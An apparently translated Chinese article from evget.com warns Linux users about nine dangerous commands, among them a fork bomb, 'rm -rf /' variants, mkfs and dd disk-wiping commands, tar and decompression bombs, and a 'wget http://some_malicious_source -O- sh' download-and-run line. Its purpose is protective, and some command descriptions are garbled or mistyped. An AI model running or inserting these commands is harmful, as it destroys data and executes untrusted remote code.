[[122297]]

Linux shell/terminal 命令非常強大，即使一個簡單的命令就可能導(dǎo)致文件夾、文件或者路徑文件夾等被刪除。

在一些情況下，Linux 甚至不會詢問你而直接執(zhí)行命令，導(dǎo)致你丟失各種數(shù)據(jù)信息。

一般來說在 Web 上推薦新的 Linux 用戶執(zhí)行這些命令，當然，也有人哪些寫過這代碼的人不這么想，因為這玩意你一寫下去就不是玩笑了。

這里我收集了一些對系統(tǒng)有危害的 Linux 代碼，幫助你避免他們。請記?。哼@些代碼非常危險，甚至可以經(jīng)過修改，變得更加有危害性。

還有一些事情需要注意：一些命令只在 Ubuntu 中有 sudo 前綴時是有危害的。其他發(fā)行版本的 Linux，則是在作為根目錄命令時會有危害。

1. Linux Fork Bomb Command

:(){ :: & };: 以 Fork Bomb 聞名，是一個拒絕服務(wù)攻擊的 Linux 系統(tǒng)。:(){ :: & };: 是一個 bash 函數(shù)。只要被執(zhí)行，他會不斷重復(fù)，直到系統(tǒng)被凍結(jié)。

你只能重啟系統(tǒng)解決這個問題。所以當你在 Linux 界面執(zhí)行這個命令時一定要注意。

2. Mv Folder/Dev/Null Command

mv folder/dev/null 也是一個危險的命令。Dev/null 或者 null device 是一個刪除所有寫在這個設(shè)備文件上數(shù)據(jù)的設(shè)備文件，但是，該操作提示卻是寫入操作執(zhí)行成功。這就是我們常說的 bit bucked 或者 black hole。

3. Rm -Rf Command

rm -rf命令在 Linux 系統(tǒng)中可以快速刪除文件夾及其內(nèi)容。如果，你不知道如何正確使用它，你就只有哭了。

列下m-rf 命令最常見的組合和選擇：

rm command ：刪除 Linux 系統(tǒng)的文件

rm -f command：不需提示，刪除文件中的只讀文件

rm -r command 循環(huán)刪除文件夾的內(nèi)容

rm -d command ：刪除空目錄，如果非空目錄則不會執(zhí)行該操作

rm -rf/ command：強制刪除根目錄中的所有內(nèi)容和子文件夾（包括寫保護文件）命令。

rm -rf* command ：強制刪除當前目錄中的所有內(nèi)容（當前工作目錄）和字文件夾

rm -rf. command：強制刪除當前文件夾目錄/子目錄中的所有內(nèi)容 。同 rm -r.[^.]*

The rm -r.[^.]* command ：刪除文件及文件夾，帶有刪除提示

4. Mkfs Command

如果你不知 mkfs 的作用，那么它也是一個危險的命令，mkfs 之后寫的任何命令都將會被一個空白的 linux 文件系統(tǒng)格式化、替代。

下面列舉出需要管理員權(quán)限，格式化硬盤的命令：

mkfs

mkfs.ext3

mkfs.bfs

mkfs.ext2

mkfs.minix

mkfs.msdos mkfs.reiserfs

mkfs.vfat

mkfs.cramfs 也可以和上面的代碼做同樣的事情，不過不需要管理源權(quán)限。

5. Tar Bomb

tar 命令用于將多個文件以 .tar 格式放入一個文件中（存檔文件）。Tape Archive (Tar) bomb 可以由他創(chuàng)建。

當為壓縮時，就是這個存檔文件生成數(shù)以萬計的相似名稱文件出現(xiàn)在當前目錄中而不是新目錄。

當收到 tar 文件，定期創(chuàng)建一個新的保護目錄，然后在解壓前將接受的 tar 文件放到這個目錄中，你可以避免成為 tar bomb 的受害者。

6. Dd Command

Dd命令用于復(fù)制&改變硬盤分區(qū)。如果，你用錯地方了，那么也很危險。

下面列舉 dd 命令：

dd if=/dev/hda of=/dev/hdb

dd if=/dev/hda of=/dev/sdb

dd if=something of=/dev/hda

dd if=something of=/dev/sda

下面這個命令會將整個主硬盤清零：dd if=/dev/zero of=/dev/had

7. Shell Script Code

有時候，你可能會被人坑，給你一個 shell 腳本文件，讓你去下載并執(zhí)行它。該腳本可能會包含一些惡意的或危險的代碼。命令形式可能會是這樣：wget http://some_malicious_source -O- sh。 wget 將會在 sh 狹隘腳本時下載腳本。

8. Malicious Source Code

也許有人會給你源代碼讓你編譯他。代碼可能是正常代碼，不過，有一些惡意代碼偽裝在大型源代碼中，如果是這樣，你的系統(tǒng)就中槍了。如何避免？僅接受并編譯可信賴來源的源代碼。

9. Decompression Bomb

你已經(jīng)收到一個壓縮文件，你被要求提取這個看起來很小的文件，可能小到 KB。事實上，該小尺寸的壓縮文件包含高度壓縮數(shù)據(jù)。

只要文件解壓，上百 GB 數(shù)據(jù)會被提取，這時候，過大的數(shù)據(jù)填滿硬盤導(dǎo)致宕機，幾率就很大了。如何避免？還是那句老話，別手賤，什么文件都去接收，請接收可信任來源文

本文鏈接：http://www.evget.com/article/2014/11/4/21781.html